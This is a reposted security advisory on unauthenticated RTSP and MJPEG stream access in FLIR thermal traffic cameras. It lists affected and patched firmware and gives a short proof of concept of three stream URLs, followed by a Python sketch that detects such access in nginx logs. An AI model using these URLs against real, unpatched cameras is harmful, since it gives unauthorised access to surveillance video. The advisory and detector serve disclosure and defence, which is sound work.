TheHackerWorld Official

FLIR Thermal Traffic Cameras 1.01-0bb5b27 - RTSP Stream Disclosure

# Exploit Title: FLIR Thermal Traffic Cameras 1.01-0bb5b27 - RTSP Stream Disclosure
# Author: Gjoko 'LiquidWorm' Krstic
# Date: 2018-10-06
# Vendor: https://www.flir.com
# Link: https://www.flir.com/security/best-practices-for-cybersecurity/
# CVE: N/A
# Tested on: nginx/1.12.1, nginx/1.10.2, nginx/1.8.0, Websocket/13 (RFC 6455)

# Affected firmware version: V1.01-0bb5b27 (TrafiOne)     Codename: TrafiOne
#                           E1.00.09      (TI BPL2 EDGE) Codename: TIIP4EDGE
#                           V1.02.P01     (TI x-stream)  Codename: TIIP2
#                           V1.05.P01     (ThermiCam)    Codename: ThermiCam
#                           V1.04.P02     (ThermiCam)    Codename: ThermiCam
#                           V1.04         (ThermiCam)    Codename: ThermiCam
#                           V1.01.P02     (ThermiCam)    Codename: ThermiCam
#                           V1.05.P03     (TrafiSense)   Codename: TrafiSense
#                           V1.06         (VIP-IP)       Codename: VIP-IP
#                           V1.02.P02     (TrafiRadar)   Codename: TrafiRadar

# Vendor patched firmware version:
#
# Product name                Firmware      Released 
# ----------------------------------------------------
# ThermiCam / TrafiSense      E1.06.03      17.09.2018
# TI BPL2 EDGE                V1.00         17.09.2018
# TI x-stream                 E1.03.02      17.09.2018
# TrafiOne                    E1.02.02      17.09.2018
# ----------------------------------------------------

# Description
# FLIR thermal traffic cameras allow unauthenticated and unauthorized access to
# the live RTSP video stream.

# Advisory ID: ZSL-2018-5489
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5489.php

# Simple PoC:

http://Target/live.mjpeg?id=1

rtsp://Target/mpeg4

http://Target/snapshot.jpg
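
A detection sketch for the HTTP endpoints listed above, added here as an example and not part of the original advisory: it scans nginx access logs for successful, credential-less requests to the stream and snapshot paths from outside an allowlist. It assumes the logs use nginx's "combined" format; the allowlisted network and the sample log lines are constructed, and RTSP access does not appear in HTTP logs, so it needs separate monitoring.

```python
import ipaddress
import re

# nginx "combined" format: ip - user [time] "METHOD target PROTO" status bytes "ref" "ua"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# HTTP stream/snapshot paths named in the advisory PoC
STREAM_PATHS = {"/live.mjpeg", "/snapshot.jpg"}
# Assumption: networks allowed to pull video (e.g. a traffic-management VLAN)
ALLOWED_NETS = [ipaddress.ip_network("10.20.0.0/24")]


def find_unauthenticated_stream_hits(lines, allowed_nets=ALLOWED_NETS):
    """Return (ip, time, target) for 2xx, credential-less stream requests from outside the allowlist."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        path = m["target"].split("?", 1)[0]  # drop the query string (?id=1)
        if path not in STREAM_PATHS:
            continue
        if not m["status"].startswith("2") or m["user"] != "-":
            continue  # request was denied, or carried HTTP auth credentials
        try:
            src = ipaddress.ip_address(m["ip"])
        except ValueError:
            continue  # client field is not an IP address
        if any(src in net for net in allowed_nets):
            continue  # expected consumer of the video feed
        hits.append((m["ip"], m["time"], m["target"]))
    return hits


# Constructed sample log lines (documentation address ranges), not real traffic
SAMPLE_LOG = [
    '10.20.0.15 - - [06/Oct/2018:10:00:01 +0000] "GET /live.mjpeg?id=1 HTTP/1.1" 200 51234 "-" "vms/1.0"',
    '198.51.100.7 - - [06/Oct/2018:10:02:11 +0000] "GET /snapshot.jpg HTTP/1.1" 200 20480 "-" "curl/7.61"',
    '198.51.100.7 - - [06/Oct/2018:10:02:15 +0000] "GET /snapshot.jpg HTTP/1.1" 401 195 "-" "curl/7.61"',
    '203.0.113.9 - operator [06/Oct/2018:10:03:00 +0000] "GET /live.mjpeg?id=1 HTTP/1.1" 200 49000 "-" "Mozilla/5.0"',
    '203.0.113.44 - - [06/Oct/2018:10:05:42 +0000] "GET /live.mjpeg?id=1 HTTP/1.1" 200 50112 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, when, target in find_unauthenticated_stream_hits(SAMPLE_LOG):
        print(f"unauthenticated stream access: {ip} {when} {target}")
```

On firmware with the vendor fix applied, the same requests should appear with a non-2xx status or a populated user field, so a non-empty result on a patched device is worth investigating.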
            
